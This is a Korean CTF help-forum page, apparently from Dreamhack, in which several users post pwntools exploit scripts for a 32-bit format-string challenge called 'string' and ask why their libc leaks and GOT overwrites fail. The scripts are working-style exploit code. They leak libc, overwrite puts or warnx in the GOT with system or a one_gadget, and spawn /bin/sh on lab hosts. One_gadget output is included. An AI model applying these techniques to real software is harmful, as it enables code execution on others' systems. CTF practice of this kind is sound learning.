string

got를 덮었는데 뭐가 문젠지를 잘 모르겠습니다 local에서는 쉘이 따이는 데 remote했을때는 안됩니다..

#!/usr/bin/env python3 from pwn import * import re context.terminal = ['tmux', "splitw"] context.log_level = "debug" e = ELF("./string") HOST = "127.0.0.1" PORT = 12345 #HOST = "host1.dreamhack.games" #PORT = 23936 conn = process([e.path, e.path], env={"LD_PRELOAD":"./libc.so.6"}) #conn = remote(HOST, PORT) fms = lambda value,offset: b"%"+bytes(str(value), encoding="utf8")+b"c"+b"%"+bytes(str(offset), encoding="utf8")+b"$hn" libc_offset = 0x18637 one_gadget_offset = 0x3a812 conn.sendlineafter("> ", "1\n%71$p") conn.sendlineafter("> ", "2") #conn.recv() # only use on remote libc_start_main = int(re.search(b"0xX+", conn.recv(timeout=0.5)).group(), 16) #libc_start_main = int(conn.recv() for v0 in range(2)[:10], 16) libc_addr = libc_start_main - libc_offset one_gadget = libc_addr + one_gadget_offset print(hex(libc_addr)) print(hex(one_gadget)) payload = b"" payload += p32(e.got["puts"]+2) payload += p32(e.got["puts"]+0) payload += fms(int((hex(one_gadget)[2:])[:4], 16)-8, 5) payload += fms(int((hex(one_gadget)[2:])[:4], 16)-int((hex(one_gadget)[2:])[4:],16), 6) conn.sendline("1") conn.sendlineafter("Input: ", payload) conn.sendlineafter(b"> ", "2") gdb.attach(conn) conn.interactive() `

`

lb = libc_leak - offset print(f"libc_base = {hex(lb)}") # 0xf7d3f000 system = lb + libc.symbols['system'] + 0x10 # 이래야 system주소가 정상적으로 따집니다.. print(f"system_addr = {hex(system)}") # 0xf7df3950 libc_base가 000으로 끝나는걸 보니 libc_base는 잘 따진 것 같은데.. libc.symbols["system"]으로 system의 주소를 구하면 system - 0x10의 주소가 따집니다.. 전체 코드는 풀이 과정에 올려놓았습니다..ㅠㅠ 도움 부탁드립니다..!!

payload = p32(e.got['printf']) payload += b"%x%x%x%x.%s" In(payload) Pr() io.recvuntil('.') printf = u32(io.recv(4)) print(hex(printf)) libc_leak = printf - libc.symbols['printf'] remote에서는 정상적으로 libc leak이 되는데.. image.png local에서는 libc leak이 안되네요.. 왜이러는지 궁금합니다 image.png

from pwn import * #context.log_level = "debug" r = remote("host3.dreamhack.games", 24119) #r = process("/home/asdf/dreamhack/string/string") libc = ELF("/home/asdf/dreamhack/string/libc.so.6") e = ELF("/home/asdf/dreamhack/string/string") system = libc.sym['system'] printf_got = e.got['printf'] def inp(input): r.sendlineafter(b"> ", b'1') r.sendafter(b": ", input) def p(): r.sendlineafter(b"> ", b'2') #libc base payload = p32(printf_got) payload += b"%x%x%x%x%s" inp(payload) p() lb = u32(r.recvuntil(b"\xf7")[-4:].ljust(4, b'\x00')) libc_base = lb - libc.sym['printf'] print("libc base : ", hex(libc_base)) #got overwrite system = system + libc_base system1 = hex(system)[:6] system2 = hex(system)[6:] print("system : ", hex(system)) fsb = fmtstr_payload(5, {e.got['warnx'] : (libc.sym['system'] + libc_base)}) fsb = p32(e.got['warnx']) fsb += p32(e.got['warnx'] + 2) fsb += "%{}c%5$hn".format(int(system2, 16)-4).encode() fsb += "%{}c%6$hn".format(int(system1, 16)-int(system2, 16)).encode() inp(fsb) #got overwrite inp(b"/bin/sh" + b"\x00") p() r.interactive() gdb로 확인해본 결과 got이 덮히지가 않습니다. 무슨 이유인지는 모르겠어요 혹시나 fmtstr_payload의 문제일 수도 있어서 수동으로도 해봤는데 똑같이 got이 덮히지 않네요ㅠㅠ 아주 조금의 힌트라도 부탁드립니다. 일단 저의 시나리오는 fsb로 libc base를 구하고 warnx의 got을 system함수로 덮은뒤 input함수에서 buf에 "/bin/sh" 를 넣어준뒤 print함수에서 wanrx(buf)를 할 때 최종적으로 system("/bin/sh")를 실행하려고 합니다.

from pwn import * context.log_level = 'debug' def send_payload(payload): print r.sendline(payload) r = remote("host1.dreamhack.games", 8377) libc = ELF('./libc.so.6') e = ELF('./string') printf_got = e.got['printf'] warnx_got = e.got['warnx'] printf_offset = libc.symbols['printf'] one_gadget = 0x3a80c payload = "" payload += p32(printf_got) payload += '%x%x%x%x.%s' print r.recvuntil("> ") r.sendline("1") print r.recvuntil("Input: ") r.sendline(payload) print r.recvuntil("> ") r.sendline("2") print r.recvuntil(".") printf_libc = u32(r.recv(4)) print hex(printf_libc) libc_base = printf_libc - printf_offset one_gadget_libc = libc_base + one_gadget fmt = FmtStr(send_payload, offset = 5) print r.recvuntil('> ') r.sendline('1') print r.recvuntil('Input: ') fmt.write(warnx_got, one_gadget_libc) fmt.execute_writes() print hex(one_gadget_libc) print r.recvuntil('> ') r.sendline('2') print r.recvuntil('> ') r.sendline('2') r.interactive() 포멧 스트링 버그를 이용하면 되므로 처음엔 그 후 하지만 Input Print Exit [DEBUG] Sent 0x2 bytes: '2\n' [*] Switching to interactive mode [*] Got EOF while reading in interactive $ id [DEBUG] Sent 0x3 bytes: 'id\n' $ id [DEBUG] Sent 0x3 bytes: 'id\n' [*] Closed connection to host1.dreamhack.games port 8377 [*] Got EOF while sending in interactive 와 같이 셸이 실행되지 않고 종료되었습니다. warnx함수가 실행되지 않은걸로 보아 warnx의 got주소는 잘 덮어씌워진 것으로 보입니다. one_gadget의 라이브러리 주소를 구할 때 문제가 있는 건가요? User@DESKTOP-A0EPTKG:~/CTF$ one_gadget ./libc.so.6 0x3a80c execve("/bin/sh", esp+0x28, environ) constraints: esi is the GOT address of libc [esp+0x28] == NULL 0x3a80e execve("/bin/sh", esp+0x2c, environ) constraints: esi is the GOT address of libc [esp+0x2c] == NULL 0x3a812 execve("/bin/sh", esp+0x30, environ) constraints: esi is the GOT address of libc [esp+0x30] == NULL 0x3a819 execve("/bin/sh", esp+0x34, environ) constraints: esi is the GOT address of libc [esp+0x34] == NULL 0x5f065 execl("/bin/sh", eax) constraints: esi is the GOT address of libc eax == NULL 0x5f066 execl("/bin/sh", [esp]) constraints: esi is the GOT address of libc [esp] == NULL one_gadget의 offset은 이렇게 구했고 6개의 offset 모두 다 위와 같은 결과였습니다.